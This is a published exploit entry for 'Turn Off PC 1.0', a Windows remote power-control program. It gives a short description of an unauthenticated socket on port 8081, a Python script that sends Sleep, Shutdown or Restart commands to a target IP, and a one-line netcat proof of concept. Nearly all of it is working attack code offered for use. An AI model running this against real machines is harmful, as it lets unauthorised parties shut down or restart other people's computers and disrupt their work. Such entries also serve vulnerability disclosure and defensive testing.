# Exploit Title: Turn Off PC 1.0 - Unauthenticated Remote System Control
(Shutdown/Restart/Sleep)
# Date: 02/07/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://turnoffpc.com/
# Software Link: https://turnoffpc.com/download/Turn%20Off%20PC%20Setup.exe
# Version: 1.0
# Tested on: Windows 10

'''
Description:

The software exposes an unsecured socket (port 8081) allowing complete
remote power control (shutdown, restart, sleep) without authentication,
enabling system disruption attacks.

'''


import socket
import argparse

COMMANDS = {"sleep": "Sleep", "shutdown": "Shutdown", "restart": "Restart"}

def send_command(ip, command_key):
    if command_key not in COMMANDS:
        print(f"Unknown command: '{command_key}'. Supported: {',
'.join(COMMANDS.keys())}")
        return

    try:
        with socket.create_connection((ip, 8081), timeout=5) as s:
            s.sendall(COMMANDS[command_key].encode())
            try:
                print(s.recv(4096).decode(errors="ignore") or "No response")
            except socket.timeout:
                print("No response (timeout)")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Send
Sleep/Shutdown/Restart command to Turn Off PC version 1.0.")
    parser.add_argument("--ip", help="Target IP")
    parser.add_argument("command", help="sleep/shutdown/restart")
    send_command(parser.parse_args().ip,
parser.parse_args().command.lower())



POC:

echo -n "Restart" | nc 192.168.8.104 8081